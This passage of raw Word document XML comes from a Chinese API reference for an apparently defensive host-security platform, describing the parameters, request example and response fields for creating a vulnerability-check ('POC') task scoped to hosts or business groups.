            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02B0B6C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>范围，0:全部主机,type为0时，agents和groups不传; 1:主机范围，如果type=1, 则agents必传; 2:业务组范围，如果type=2,则groups必传 不传时为0全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="653AD311" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17887A3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C687F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="005B2112" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43105933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26F72640" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC01DBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1141274A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B8CF6A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39DE79E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Linux的主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="728339D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>参数说明：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocTaskCreateParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1505"/>
        <w:gridCol w:w="2137"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="3335"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FDE0CD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F4EF015" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025D1C97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491E80DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32422DA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58E15002" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="749FCEF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D4271C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32ED325E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B207C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险检查项Id，见4.5.6接口 ,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A13BC6C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56C73A16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>executeTypes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340C4445" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55A3E295" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B384DF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检测方式,必传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79227BB0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32303DD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC173A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map&lt;String, Object&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7F25B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17D59E31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>输入参数 ,可选</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AF0107D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B56780"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add</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>liangyong_test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pocTaskCreateParams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT042016002534",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>executeTypes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "params": {}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1850560B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D01B4D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "5c417ad07d761b3224c4280a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "59080851823593e1a80b",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "name": "liangyong_test1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "status": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "remark": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "2019-01-18 15:05:52",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronTaskId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "realm": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "type": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "groups": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "agents": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "ff0878fac4add80c"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部主机222",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lastExecuteTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25839BEF"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753"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1672"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="21B33F7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501F505" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77218872" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C7C7021" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE67F6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2BF9675D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74972513" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65765079" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FA147E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F0D3C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B3733F7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19FF2E1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D989B0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12810204" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A37013B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="721F8C44" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FD14432" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A323E95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14979CE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="176AAA9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="400F6C6F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F5500FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B13E684" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="057F326B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>255)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BBDEBE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38C3625E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ABFB9AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18427259" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48296DAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7860E879" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否启用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A2F0210" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
